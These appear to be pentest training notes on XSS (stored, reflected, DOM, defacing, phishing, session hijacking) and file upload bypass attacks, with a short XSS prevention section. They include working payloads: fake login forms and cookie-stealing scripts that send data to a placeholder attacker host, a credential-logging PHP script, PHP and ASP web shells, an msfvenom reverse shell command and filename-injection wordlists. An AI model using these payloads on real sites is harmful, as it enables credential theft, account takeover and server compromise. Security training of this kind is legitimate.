#### **`Stored XSS`**

If the XSS payload gets stored in the back-end database and retrieved upon visiting the page, this means that the XSS attack is persistent and may affect any user that visits the page. Stored XSS attacks may not be easily removable, and the payload may need removing from the back-end database. 

Determine whether user input is displayed on the page. If no sanitization or filtering was applied to the input, the page might be vulnerable to XSS. Begin by testing the page to determine whether it is vulnerable to XSS with the folliwng basic payload:
```js
<script>alert(window.origin)</script>
```
* If the page allows any input and does not perform any sanitization on it, the alert should pop up with the URL of the page it is being executed on everytime the payload is input or when the page is refreshed. 
   * Confirm this by inspecting the page source; the payload should be directly included there

> Many modern web apps use cross-domain IFrames to handle user input, so that even if the web form is vulnerable to XSS, it would not be a vulnerability on the main web app. This is why `window.origin` is more effective than a static value. 

As some modern browsers may block the `alert()` JS function in specific locations, it is useful to know other basic XSS payloads to verify the existence of XSS: 
```js
<plaintext>    #Stops rendering the HTML code that comes after it and displays it as plaintext

<script>print()</script>   #Pops up the browser print dialog, which is unlikely to be blocked by any browsers
```

Tp confirm whether the payload is persistent and stored on the back-end, the page can be refreshed to see whether the alert is shown again. Again, any user who visits the page will trigger the XSS payload and get the same alert. 

Besides these payloads, the following can also be used as user input:
```js
<script>alert(1)</script> 

<script>alert(window.origin)</script>

<script>print('{Anything}')</script>

<script>alert(document.cookie)</script>
```

<a id="reflectedxss"></a>

#### **`Reflected XSS`**

Reflected XSS vulnerabilities occur when user input reaches the back-end server and gets returned to the user without being filtered or sanitized. There are many cases in which the entire user input might get returned to them, like error messages or confirmation messages. In these cases, users can attempt using XSS payloads to see whether they execute; however, as these messages are usually temporary, once leaving the page, they will not execute again, meaning they are non-persistent.

Similar to that of stored XSS, determine whether user input is displayed on the page after entering it:
* If the user input is included as part of the error message, and if the input was not filtered or sanitized, the page may be vulnerable to XSS. 

Again, try the `<script>alert(window.origin)</script>` payload or other basic XSS payloads. While these may execute, an error message will also be generated but without the exact user input; an empty string may be shown. This is because the payload is wrapped with a `<script>` tag that does not get rendered by the browser.
* The payload, however, can be viewed by inspecting the page source. 
   
Depending on which HTTP request is used to send user input to the server, victims can be targeted through this type of XSS. This can be checked through the Firefox Developr Tools (CTRL+Shift+I) and selecting the Network Tab. After doing so, the payload can be tested, clicking Add to send it.
* Find the row that has the particular request, most likely a GET request

* To target the user, send them a URL containing the payload
   * To get the URL, copy the URL from the URL bar after sending the XSS payload, or right click on the request in the Network tab and copy the URL


Besides these payloads, the following can also be used as user input:
```js
<img src="" onerror=alert(window.origin)>

<img src="" onerror=alert(document.cookie)>

#"><img src=/onerror=alert(document.cookie)>
```

<a id="domattacks"></a>

#### **`DOM Attacks`**

DOM XSS is completely processed on the client-side through JS. DOM XSS occurs when JS is used to change the page source through the **`Document Object Model (DOM)`.**

To determine whether a web app is vulnerable to DOM XSS, check whether a new request is being made through the Network Tab in the Developer tools by adding an item
* The input parameter in the URL may use a `#` for the item added, which means that this is a client-side parameter that is completely processed on the browser. This indicates that the input is being processed at the client-side through JS and never reaches the back-end, therefore being a DOM-based XSS

* By inspecting the page source, the input string will also not be found. This is because the JS code is updating the page when the Add button is clicked in the Developer tools, which is after the page source is retrieved by the browser; therefore, the base page source will not show the input. If the web page is refreshed, it will also not be retained. 

To better understand DOM-based XSS vulnerabilities, the concept of the **`Source and Sink`** of the object displayed on the page must be understood.
* The **Source** is the JS object that takes the user input, and it can be any input parameter like a URL parameter or an input field

* The **Sink** is the function that writes the user input to a DOM object on the page. If the Sink function does not properly sanitize the user input, it would be vulnerable to an XSS attack. Some of the commonly used JS functions to write to DOM objects include:
   * `document.write()`
   * `DOM.innterHTML`
   * `DOM.outerHTML`
   * Some of the jQuery library functions that write to DOM objects include the following
      * `add()`
      * `afer()`
      * `append()`

If a Sink function writes the exact input without any sanitization (like the above functions), and no other means of sanitization were used, then the page would be vulnerable to XSS. To determine this, look at the source code and check the JS script (often script.js), and look at the parameter that the **Source** is taking. It may look like the following:
```js
var pos = document.URL.indexOf("task=");
var task = document.URL.substring(pos + 5, document.URL.length);
```

Now, determine if there is a **Sink** function. Using the Source as an example, the following shows a related **Sink** that is vulnerable to DOM-based XSS:
```js
document.getElementById("todo").innerHTML = "<b>Next Task:</b> " + decodeURIComponent(task);
```
* At this point, it is clear that the input can be controlled and the output is not sanitized; therefore, the page is vulnerable to DOM-based XSS.

<br>

The XSS payload will not execute if directly entered as user input. This is because the **`innerHTML`** function does not allow the use of the **`<script>`** tags within it as a security feature. Other tags, however, can be used to trigger DOM-based XSS:
```js
<img src="" onerror=alert(window.origin)>
```

In this case, a new HTML image object is created, which has a **`onerror`** attribute that can execute JS code when the image is not found. So, as an empty image link ("") is provided, the code should always get executed without having to use **`<script>`** tags. This can also be triggered by doing the following as well:
```js 
http://SERVER_IP:PORT/#task=<img src=
```

To target a user with this DOM XSS vulnerability, the URL can be copied from the browser and shared directly with them. Once they visit it, the JS code should execute. THe previous payloads are common, and there are many instances where various payloads may be used depending on the security of the web app and the browser.

<a id="xssdefacing"></a>

#### **`Defacing`**

One of the most common attacks usually used with stored XSS vulnerabilities is website defacing attacks. Defacing a website means changing its look for anyone who visits the website. Injeced JS code through XSS can be used to make a web page look different from originally intended; howver, defacing a website is usually used to send a message. Four HTML elements are usually used to change the main look of a web page:
* Background Color: `document.body.style.background`

* Background: `document.body.background`

* Page Title: `document.title`

* Page Text: `DOM.innerHTML`

Two or three of the aforementioned elements can be used to write a basic message to the web page and even remove the vulnerable element, such that it would be more difficult to quickly reset the web page

<br>

**<u>Changing Background</u>**

To change a web page's background, a certain color or image can be chosen. This color can be used as the background since most defacing attacks use a dark color for the background. To do so, the following payload can be used:
```js
<script>document.body.style.background = "#141d2b"</script>
```
* This command sets the background color to a specific hex value. This can be done, or the color can be directly named like = "black"

This will be persistent through page refreshes and will appear for anyone who visits the page; this is stored XSS.    

Besides this, the background can eb set to an image, by using the following payload:
```js
<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>
```

<br>

**<u>Changing Page Title</u>**

The page title can be changed to any title of choosing by using the `document.title` JS property:
```js
<script>document.title = 'pwned'</script>
```

After doing so, the page window/tab will have a pwned as the title

<br>

**<u>Changing Page Text</u>**

There are various JS functions for changing the text displayed on the web page. For example, the text of a specific HTML element/DOM can be changed using the innerHTML property:
```js
document.getElementById("todo").innerHTML = "New Text"
```

jQuery functions can be used for more efficiently achieving the same thing or for changing the text of multiple elements in one line. To do so, **the jQuery library must have been imported within the page source:**
```js
$("#todo").html('New Text');
```
* This gives the user various options to customize the text on the web page and make minor adjustments to meet their needs. 


To change the entire HTML code of the main body, using innerHTML, the following can be used:
```js
document.getElementsByTagName('body')[0].innerHTML = "New Text"
```
* The body element can be specified with `document.getElementsByTagName('body')`, and by specifying [0], the first body element is selected, which should change the entire text of the web page. 

<a id="xssphishing"></a>

#### **`Phishing`**

A common form of XSS phishing attacks is through injecting fake login forms that send the login details to the attacker's server, which may then be used to log in on behalf of the victim and gain control over their account

On web pages that allow a URL to be input in a user field, basic XSS payloads can be input. This can either be directly on the user field or on the URL using the appropriate parameter. 
* Start by trying the basic XSS payloads

If none of the basic XSS payloads work, the XSS Discovery process must be attempted. Before continuing, try to find an XSS payload that successfully executes JS code on the page. **To understand which payload should work, try to view how the input is displayed in the HTML source after it is added.**

<br>

**<u>Login Form Injection</u>**

Once a working XSS payload is identified, a phishing attack can be conducted. To perform this attack, HTML code must be injected that displays a login form on the targeted page. This form should send the login information to a server that the attacker is listening on, such that once a user attempts to login, the credentials will be obtained.

The following example presents a login form in HTML that can be used:
```html
<h3>Please login to continue</h3>
<form action=http://OUR_IP>
    <input type="username" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" name="submit" value="Login">
</form>
```

The following example includes a login form in HTML with XSS code. To write HTML code to the vulnerable page, the JS function `document.write()` is used. This is used with the XSS payload found during the XSS discovery step. Once the HTML code is minified into a single line and added inside the write function, the final JS code should be as follows:
```js
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
```

At this point, the JS code can be injected using the previously found XSS payload (instead of running, for example, alert(window.origin)). It would be better for the payload to be inserted directly in the URL after the appropriate parameter.

<br>

**<u>Credential Stealing</u>**

At this point, login credentials can be stolen when the victim attempts to log in on the injected login form. The aforementioned HTML form is designed to send the login request to the attackers IP, which should be listening for a connection. 

Start a netcat server to see what kind of request is received when someone attempts to login through the form:
```bash
sudo nc -lvnp 80
```

Credentials are captured whenever a victim attempts to log in with the form. However, the HTTP request will not be handled correctly and the victim would be receive an error. It would be better to use a basic PHP script that logs the credentials from the HTTP request and then returns the victim to the original page without any injections. In this case, the victim may think that they successfully logged in. **The following PHP script should do what is needed; place it in /tmp/tmpserver/**
```php
<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: <http://original page>");
    fclose($file);
    exit();
}
?>
```

The following can be done instead of using the nc listener:
```bash
mkdir /tmp/tmpserver
cd /tmp/tmpserver
vi index.php    #at this step we wrote our index.php file
sudo php -S 0.0.0.0:80
```
* The login credentials will be logged to the `creds.txt`

<a id="xsssessionhijacking"></a>

#### **`Session Hijacking`**

Modern web apps use cookies to maintain a user's session throughout different browsing sessions. This enables the user to only log in once and keep their logged in session alive even if they visit the same website at another time or date. However, they may be able to gain logged in access with the victim's user without knowing their credentials.

With the ability to execute JS code on the victim's browser, an attacker may be able to collect their cookies and send them to the server to hijack their logged in session by performing a **Session Hijacking (Cookie Stealing)** attack.

<br>

**<u>Blind XSS Detection</u>**

A blind XSS vulnerability occurs when the vulnerability is triggered on a page that is not accessible to the user. These vulnerabilities usually occur with forms only accessible by certain users. Some potential examples include:
* Contact Froms
* Reviews
* User Details
* Support Tickets
* HTTP User-Agent Header

If a message is generated after submitting user input, it indicates the handling of the input will not be seen or how it will look in the browser, since it will appear for higher-level users in a different page that is not accessible. In normal (non-blind) cases, each field can be tested for an XSS vulnerability. However, if there is no access to the separate page for higher-level users after submitting the form, this must be done in a different way. 
* To do so, use a JS payload that sends an HTTP request back to the attacker's server. If the JS code gets executed, the attacler will get a response on their machine, and they will know that the page is vulnerable. This introduces two issues:
   * **Which specific field is vulnerable?** Since any of the fields may execute the code, it is impossible to know which one did
   * **Which XSS payload should be used?** Since the page may be vulnerable, but the payload may not work

<br>

**<u>Loading a Remote Script</u>**

Before sending the payloads, a listener needs to be started on the attacker machine via netcat or php:
```bash
mkdir /tmp/tmpserver
cd /tmp/tmpserver
sudo php -S 0.0.0.0:80
```

In HTML, JS code can be written within the `<script>` tags, but they must also include a remote script by providing its URL:
```js
<script src="http://OUR_IP/script.js"></script>
```

This remote JS file can be executed that is served on the attacker's machine. The requested script name can be changed from script.js to the name of the field that is being injected, so that when the attacker gets a request, they will be able to determine which input field is vulnerable.

For example, assume there is a username input field. The following payload should be injected into that field:
```js
<script src="http://OUR_IP/username"></script>
```
If there is a request for /username, then the atacker will know that the username field is vulnerable to XSS, and so on. With that, various XSS payloads that load a remote script can be tested, noting which of them sends a request. The following are examples that can be used from [PayloadsAlltheThings:](http://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection#blind-xss)
```js
<script src=http://OUR_IP></script>

'><script src=http://OUR_IP></script>

"><script src=http://OUR_IP></script>

javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')

<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>

<script>$.getScript("http://OUR_IP")</script>
```

* Payloads that start with `>` may or may not work depending on how the input is handled in the backend. If there is access to the source code, it would be possible to precisely write the required payload for a successful injection. This is why blind XSS has a higher success rate with DOM XSS type of vulnerabilities

> Some email fields may be forced to match an email format. Even when trying to manipulate the HTTP request parameters, the input may be validated on both the front-end and the back-end. In this case, the email field will not be vulnerable, so it does not need to be tested. Similarly, the password field can be skipped, as they are usually hashed and not typically shown in cleartext

After submitting the form, wait a few seconds and check the terminal to see if anything called the server. If nothing calls the server, proceed to the next payload(s). Once the server is called, note the last XSS payload as the working payload and the input field as the vulnerable field. 

<br>

**<u>Session Hijacking</u>**

Once a working XSS payload and vulnerable input field have been identified, a session hijacking attack can be performed. This attack requires a JS payload to send the required data and a PHP script hosted on the attacker's server to grab and parse the transmitted data. 

There are several JS payloads that can be used to grab the session cookie, which again, can be found on PayloadsAllTheThings:
```js
document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;
```

Using any of the two payloads should work in sending a cookie, but the second one adds an image to the page, which may not look very malicious; the first one navigates the user to the cookie graber PHP page, which may look suspicious. Change the URL in the working XSS payload to use script.js **Either JS payload can be written to script.js, which will be hosted on the attacker's machine.** 

With the PHP server running, the code can be used as part of the XSS payload, send it in the vulnerable input field, and a call with the cookie value should be sent to the server. However, if there were many cookies, it may be difficult to know which cookie value belongs to which cookie header, so the following PHP script can be written to split them with a new line and write them to a file. In this case, even if multiple victims trigger the XSS exploit, all of their cookies will be ordered in the file:
```php
<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>
```

When a victim views the XSS payload, there will be two requests on the server, one for script.js, which in turn will make another request with the cookie value. If the previous PHP script is used, then the cookies will be logged. 
* Once the cookie value is given, use it to login to the corresponding page. This can be done by going to the Developr tools and adding a cookie value in the storage tab. Once the cookie is set up, refresh the page to get access as the victim.

<a id="xssprevention"></a>

#### **`XSS Prevention`**

XSS vulnerabilities are mainly linked to two parts of the web application: A **Source** like a user input field and a **Sink** that displays the input data. These are the two main points that should be secrued, both in the front-end and in the back-end. The most important aspect of preventing XSS vulnerabilities is proper input sanitization and validation on both the front and back end. In addition to that, other secure measures can be taken to help prevent XSS attacks. 

**<u>Front-End</u>**

As the front-end of the web app is where most of the user input is taken from, it is essential to **sanitize and validate the user input on the front-end using JS.** Code can be written to return true or false whether it matches regex validation. In addition, developrs should always ensure that they do not allow any input with JS code in it, by escaping any special characters. The DOMPurify JS library can be used for this, which escapes any special characters with a backslash `\`. which should help ensure that a user does not send any input with special characters, preventing DOM XSS vulnerabilities. Finally, the developr should always ensure that they never use user input directly within certain HTML tags. 

Besides this, avoid using JS functions that allow changing raw text of HTML fields. Ass these functions write raw text to the HTML code, if any user input goes into them, it may include malicious JS code, which leads to an XSS vulnerability:
* `DOM.innerHTML`
* `DOM.outerHTML`
* `document.write()`
* `document.writeln()`
* `document.domain`
* And the following jQuery functions:
    * `html()`
    * `parseHTML()`
    * `add()`
    * `append()`
    * `prepend()`
    * `after()`
    * `insertAfter()`
    * `before()`
    * `insertBefore()`
    * `replaceAll()`
    * `replaceWith()`

<br>

**<u>Back-End</u>**

Also, ensure that XSS vulnerabilities are prevented with measures on the back-end to prevent stored and reflected XSS vulnerabilities. Even if there is front-end validation, that will not be enough to prevent injecting a malicious payload. Therefore, there should be XSS prevention measures on the back-end as well. This can be achieved with **Input and Output Sanitization and Validation, Server Configuration, and Back-End Tools** that help prevent XSS vulnerabilities. 
* Input validation in the back-end is similar to the front-end, and it uses regex or library functions to ensrue that the input field is what is expected. It it does not match, then the back-end server will reject it and not display it

* Input sanitization can be easily bypassed by sending custom GET or POST request on the front-end. There are libraries for various back-end languages that can properly sanitize any user input, ensuring that no injection can occur. Again, the DOMPurify library can be used with a NodeJS back-end. 

* Output encoding means that any special characters are encoded into their HTML codes, which is helpful to display the entire user input without introducing an XSS vulnerability. For a PHP back-end, the `htmlspecialchars` or the `htmlentities` functions can be used, which would encode certain special characters into their HTML codes, so the browser will display them correctly, but they will not cause any injection of the sort. 


<br>

**<u>Server Configuration</u>**

The following back-end web server configurations may help in preventing XSS attacks:

* Using HTTPS across the entire domain.

* Using XSS prevention headers.

* Using the appropriate Content-Type for the page, like X-Content-Type-Options=nosniff.

* Using Content-Security-Policy options, like script-src 'self', which only allows locally hosted scripts.

* Using the HttpOnly and Secure cookie flags to prevent JavaScript from reading cookies and only transport them over HTTPS.

Also, having a good WAF can significantly reduce the chances of XSS exploitation, as it will automatically detect any type of injection going through HTTP requests and will automatically reject such requests. Furthermore, some frameworks provide built-in XSS protection, like ASP.NET

<a id="fileuploadattacks"></a>

### **`File Upload Attacks`**

If the user input and uploaded files are not correctly filtered and validated, attackers may be able to exploit the file upload feature to perform malicious activities, like execuring arbitrary commands on the back-end server to take control over it. File upload vulnerabilities are amongst the most common vulnerabilities found in web and mobile applications; they are often scored as High or Critical.

The most common reason behind file upload vulnerabilities is weak file validation and verification, which may not be well secured to prevent unwanted file types or could be missing altogether. The worst possible kind of file upload vulnerability is an **unauthenticated arbitrary file upload vulnerabilities,** in which a web app allows any unauthenticated user to upload any file type, making it one step away from allowing any user to execute code on the back-end server. 

The most common and critical attack caused by arbitrary file uploads is gaining RCE over the back-end server by uploading a web shell or uploading a script that sends a reverse shell. In some cases, the users may only be able to upload a specific file type. Even in these cases, there are various attackers that may be performed to exploit the file upload functionality if certain security protections were missing from the web app. Examples of these attacks include:
* Introducing other vulnerabilities like XSS or XXE.

* Causing a DoS on the back-end server.

* Overwriting critical system files and configurations.

Finally, a file upload vulnerability is not only caused by writing insecure functions, but is also often caused by the use of outdated libraries that may be vulnerable to these attacks.

<a id="fileuploadabsvalid"></a>

#### **`Absent Validation`**

The most basic type of file upload vulnerability occurs when the web application does not have any form of validation filters on the uploaded files, allowing the upload of any file type by default. With these types of vulnerable web apps, it is possible to directly upload a web or reverse shell; then, by just visiting the uploaded script, the attacker can interact with the shell.


**<u>Identifying Web Framework</u>**

First, upload a malicious script to determine whether any file type can be uploaded to the back-end server, testing whether it can be used to exploit the back-end. Many kinds of scripts can exploit web apps through arbitrary file upload, most commonly a web shell script and a reverse shell script. 
* **`Web Shell`:** Provides an easy method to interact with the back-end server by accepting shell commands and printing their output back within the web browser. A web shell has to be written in the same programming language that runs the web server, as it runs platform-specific functions and commands to execute system commands on the back-end server, making web shells non-corss-platform scripts.
   * Therefore, the first step is to identify what language runs the web app

Identifying the web app language can often be seen by looking at the web page extension in the URL. In certain web frameworks and web languages, web routes are used to map URLs to web pages, in which case, the web page extension may not be shown. Furthermore, file upload exploitation would also be different, as the uploaded files may not be directly routable or accessible. 

The best way to determine what language runs the web app is to visit the **`/index.ext`** page, where **ext** is swapped with various common web extensions, like php, asp, aspx, etc. 
* This can be automated via ffuf, gobuster, Burp, Zap, etc
   * Note that this method may not always be accurate, as web apps may not use index pages, or may use more than one web extension
* If this method does not work, then use Wappalyzer
   * This may be more useful as this will also identify the type and version of the web server, the back-end OS, and other technologies. 

Once the language running the web app is identified, a malicious script written in the same language can be uploaded to exploit the web app and gain RCE over the back-end server. 

<br>

**<u>Vulnerability Identification</u>**

As an initial test to identify whether arbitrary files can be uploaded, create a basic script to determine whether code can be executed with the uploaded file. The following scripts can be used as a PoC for PHP:
```bash
echo "<?php echo "Hello world"; ?> " > test.php

echo "<?php system('hostname'); ?> " > hostname.php

echo "<?php phpinfo(); ?>" > info.php
```

If the file is uploaded successfully, that indicates that the web app has no back-end file validation. Now, try to find the directory that contains the uploaded file. Once this is located, the script should print the message. This means that the echo function was executed to print the string and PHP code was successfully executed on the back-end server. 
* If the page could not run PHP code, then the source code would be printed on the page. 

<a id="fileuploadupexpl"></a>

#### **`Upload Exploitation`**

After it is confirmed that the back-end server does not validate the file, a malicious script in the same language as the web application can be uploaded. Once the malicious script is uploaded and the link is visited, it will be possibel to interact with it to take control over the back-end server. One technique is uploading a **`Web Shell`** to the web app.
* One good web shell option for PHP is **`phpbash`,** which provides a terminal-like, semi-interactive web shell. Seclists also provides many web shells for different frameworks and languages

It may be necessary to write a custom web shell in certain cases. The following is a PHP script that can be used on PHP web apps:
```php
<?php system($_REQUEST['cmd']); ?>

```
This script can be written to a .php file and uploaded to a web app. Once uploaded, system commands can be executed with the **`?cmd=`** GET parameter; i.e., ?cmd=pwd:
* If this is used in a browser, it may be best to view the source code, as it will show the command output as it would be shown in the terminal, without any HTML rendering that may affect how the output is formatted. 

If the web app is **`.NET`,** the following web shell can be created in asp:
```bash
<% eval request('cmd') %>

```

> In many cases, web shells may not work due to the web server preventing the use of some functions use by the web shell or a WAF. In these cases, advanced techniques must be used to bypass these security mitigations. 

<br>

Besides web shells, **`Reverse Shells`** can be received through the vulnerable upload functionality. To do so, start by downloading a reverse shell script in the language of the web app. 
* One good reverse shell option for PHP is **`pentestmonkey`.** Seclists also provides many reverse shells for different frameworks and languages

Once the web reverse shell is uploaded, start a netcat listener on the corresponding port of the reverse shell. Once the uploaded reverse shell is run on the back-end server, a connection will be established. 

Reverse shell scripts can also be created through **`msfvenom`.** The following example demonstrates how to create a reverse shell script in PHP that may attempt to bypass certain restrictions:
```bash
msfvenom -p php/reverse_php LHOST=<OUR_IP> LPORT=<OUR_PORT> -f raw > reverse.php

```
* The **`-p`** flag specifies the reverse shell payloads

* The **`-f`** flag specifies the output language

Once the script is generated, start a netcat listener on the specified port. After, upload the malicious script and visit its link. At this point, the reverse shell should be established. 

Reverse shells are always preferred over web shells, as they provide the most interactive method for controlling the compromised server, but they may not always work; in this case, web shells should be used. This can be due to the back-end networking having a firewall rule that denies outgoing connections, or if the web server disables the necessary functions to initiate a connection. 

<a id="fileuploadclientvalid"></a>

#### **`Client-Side Validation (Bypassing Filters)`**

Many web apps only rely on front-end JS code to validate the selected file format before it is uploaded and would not upload it if the file is not in the required format. 
* As the file format validation is happening on the client-side, interacting directly with the server can skip the front-end validations altogether.

* The front-end code can also be modified through the browser's dev tools to disable any validation in place. 

Suppose when uploading a file the file selection dialog is limited to image formats only. This indicates some form of file type validation, so a reverse shell or web shell written in the same language will be rejected.
* If validation appears to be happening on the front-end (the page won't refresh or send any HTTP requests after selecting the file), the attacker will have complete control over these client-side validations. 

   * While the web server is responsile for sending the front-end code, the rendering and execution of the front-end code happen within the browser. If the web app does not apply any of these validations on the back-end, any file type should be able to be uploaded. 

**To bypass these protections, either the upload request to the back-end server can be modified, or the front-end code can be manipulated to disable these validations.**

<br>


**<u>Back-end Request Modification</u>**

When an image is selected, it will oftentimes be reflected somewhere on the page and persist through refreshes. This indicates that the image was uploaded to the server. **Capture the upload request with Burp**

First determine where the HTTP upload request is being sent to; this is often a post request. This way, the request can be modified to meet the needs of the attacker without having the front-end type validation restrictions. If the back-end server does not validate the uploaded file type, then the attacker should be able to send any file type/content, and it would be uploaded to the server. **The following are the two important parts in the request, both at the end of the request:**
1. **`filename=`:** The filename should be modified to the same language as the server

2. **`File Content`:** The content should be modified to a web/reverse shell. In the case of an image, all of the original image data can be deleted and replaced with a shell. 

> The Content-Type of the uploaded file can also be modified.

If the request goes through, visit the uploaded file, interact with it, and gain RCE

<br>

**<u>Disabling Front-end Validation</u>**

Front-end code is processed completely within the web browser, so the attacker can modify the scripts or disable them entirely. After this is done, the attacker can use the upload functionality to upload any file type without needing to use Burp to capture and modify their requests. 

Begin by **toggling the browser's `Page Inspector,`** and then click on where the uploaded image is reflected. This will highlight the corresponding HTML file input, but depending on the front-end code, it will vary:
* Look through the code, specifically the event handler attributes

* Determine which attribute runs code whenever a file is selected, this will indicate that file type validation
    * Once the attribute is determined, go to the browsers **`Console`** and type the function's name to get its details. The function's name is the function declared by the attribute. 

    * Read through the function and either add PHP as one of the allowed extensions or modify the function to remove the extension check. It may be easier to remove the extension check instead of writing and modifying JS code. However, make sure that removing the extension check does not break anything: it does not in most cases. 

* If deciding to **delete the function, go back to the `Page Inspector`** and double click on the function name to select it, then delete it. 
    * To make file selection easier, attributes that specify allowable file extensions can also be removed. This is not mandatory, however. 

> It is important to remember that the modifications made to the source code will not persist through page refreshes. However, it will be enough to bypass the client-side validation

Once the shell is uploaded, use the **`Page Inspector`** again and click on the profile image; this will lead to the URL of the uploaded shell in most cases. Click on the link and interact with the shell to execute commands on the back-end server. 

<a id="fileuploadblkfilt"></a>

#### **`Blacklist Filters (Bypassing Filters)`**

If attempting to bypass client-side validation by modifying front-end code or interacting directly with the back-end does not work, this indicates that the web app may have some form of file type validation on the back-end, in addition to the front-end validations. There are generally two common forms of validating a file extension on the back end:
* **Testing against a `blacklist` of types**

* **Testing against a `whitelist` of types**

The validation may also check the file type or the file content for type matching. The weakest form of validation amongst these is testing the file extension against a blacklist of extension to determine whether the code upload request should be blocked. 
* In some cases, the code will take the file extension from the uploaded file name and then compare it against a list of blacklisted extensions. This validation method is not comprehensive, as many other extensions are often not included in this list, which may still be used to execute code on the back-end server if uploaded. 

* Many times, the comparisons are case-sensitive, only considering lowercase extensions. In Windows servers, file names are case insensitive, so try uploading a file with a mixed-case (i.e., pHp), which may bypass the blacklist. Try to exploit this weakness to bypass the blacklist and upload malicious files. 

<br>

**<u>Fuzzing Extensions</u>**

If the web app seems to be testing the file extension, the first step should be to **fuzz the upload functionality with a list of potential extensions and see which of them return an error message.** Any upload request that does not return an error message, returns a different message, or succeeds in uploading the file, may indicate an allowed file extension. 
* Use either PayloadsAlltheThings or seclists for common web extensions

For Burp, send the upload request to **`Intruder`** and select the **`.ext`** to add it as a fuzzing position. Keep the file content the same for this attack, as only the file extensions are being fuzzed. **Untick the URL Encoding option** to avoid encoding the period before the file extension. Once this is done, start the attack to start fuzzing for file extensions that are not blacklisted. 
* When this is done, sort the results by length. It will be clear from this point which extensions are validated, as they will all have a certain Content-Length and a success message. 

<br>

**<u>Non-Blacklisted Extensions</u>**

At this point, try uploading a file using any of the allowed extensions from the previous extension scan. Some of them may allow the execution of code. It is important to remember that not all the previously validated extensions will work with all web server configurations, so many of the extensions may need to be attempted to determine which one successullt executes code. 
* Send the successful extensions to **`Repeater`**
   * Change the **File Name** of the malicious script to use the extension

   * Change the **Content** to that of a shell

Once a malicious file is uploaded, the final step is to visit the uploaded file, which should be under the image upload directory. At this point, test executing a command if it is a web shell or start a netcat listener. This will confirm if the blacklist was bypassed or not.

<a id="fileuploadwhitefilt"></a>

#### **`Whitelist Filters (Bypassing Filters)`**

A whitelist is generally more secure than a blacklist. The web server would only allow the specified extensions, and the list would not need to be comprehensive in covering uncommon extensions. Still, there are different use cases for a blacklist and for a whitelist. 
* While a blacklist may be helpful in cases where the upload functionality needs to allow a wide variety of file types, a white list is usually only used with upload functionalities where only a few file types are allowed. Both may also be used in tandem


**<u>Whitelisting Extensions</u>**

Like fuzzing for allowable extensions not on the blacklist, the same can be done in the case of a whitelist through **`Burp Intruder`.** It is important to note that error messages do not always reflect which form of validation is being used. 
* In the case of a whitelist, it is possible that all variations of PHP extensions, for example, are blocked. Try to fuzz the upload form with a seclist or PayloadsAlltheThings wordlist to find what extensions are whitelisted by the upload form

* Look through the requests to find malicious extensions that were not blocked. Some scripts use regex to test whether the file name contains any whitelisted image extensions
   * Regex only checks whether the file name contains the extension and not if it actually ends with it.

<br>

**<u>Double Extensions</u>**

Oftentimes, the code only tests whether the file name contains an image extension; a straightforward method of passing the regex test is through **Double Extensions.** For example, if the `.jpg` extension was allowed, it can be added to the upload file name while still ending the file name with `.php` (i.e., shell.jpg.php), in which case, should be able to pass the whitelist test while still uploading a PHP script that can execute PHP code.

At this point, intercept a normal upload request, and modify the filename and content to that of a web shell or reverse shell. Once the upload is successful, visit the uploaded file and try to send a command. If this works, that means that the uploaded file is a fully working script. 

This method may not always work, as some web apps may use a strict regex pattern; however, there are other exploitation techniques that may allow an attacker to bypass the pattern, but most rely on misconfigurations or outdated systems. 

<br>

**<u>Reverse Double Extension</u>**

In some cases, the file upload functionality itself may not be vulnerable, but the web server configuration may lead to a vulnerability. For example, an organization may use an open-source web app that has a file upload functionality. Even if the file upload functionality uses a strict regex pattern that only matches the final extension in the file name, the organization may use the insecure configurations for the web server. 

In this case, try to change the filename to something like **`shell.ext.jpg`** and change the file content to that of a web or reverse shell. If this works, visit the uploaded file and attempt to execute a command (webshell) or start a listener (reverse shell).

<br>

**<u>Character Injection</u>**

Another method of bypassing a whitelist validation test can be through character injection. **Several characters can be injected before or after the final extension to cause the web app to misinterpret the filename** and execute the uploaded file as a malicious script. The following are some of the characters that can be attempted in specific use cases:
* `%20`

* `%0a`

* `%00` shell.php%00.jpg works with PHP servers with version 5.x or earlier, as it causes the PHP web server to end the file name after the %00, and store it as shell.php, while still passing the white list

*`%0d0a`

* `/`

* `.\`

* `.`

* `…`

* `:` May be used with web apps hosted on a Windows Server. This is used by injecting a colon before the allowed file extension (i.e., shell.aspx:.jpg), which would store the file as shell.aspx

Each of the other characters has a use case that may allow the upload of a PHP script will bypassing the type validation test. A bash script can be written to generate all permutations of the file name, where the above characters would be injected before and after both the PHP and JPG file extensions:
```bash
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
    for ext in '.php' '.phps'; do
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done

```

With this custom wordlist, run a fuzzing scan with **`Burp Intruder`,** similar to the aforementioned ones. If either the back-end or the web server is outdated or has certain misconfigurations, some of the generated filenames may bypass the whitelist test and execute PHP code (in this case).
* The script can be modified to add more PHP extensions to generate more file name permutations. 

<a id="fileuploadtypefilt"></a>

#### **`Type Filters (Bypassing Filters)`**

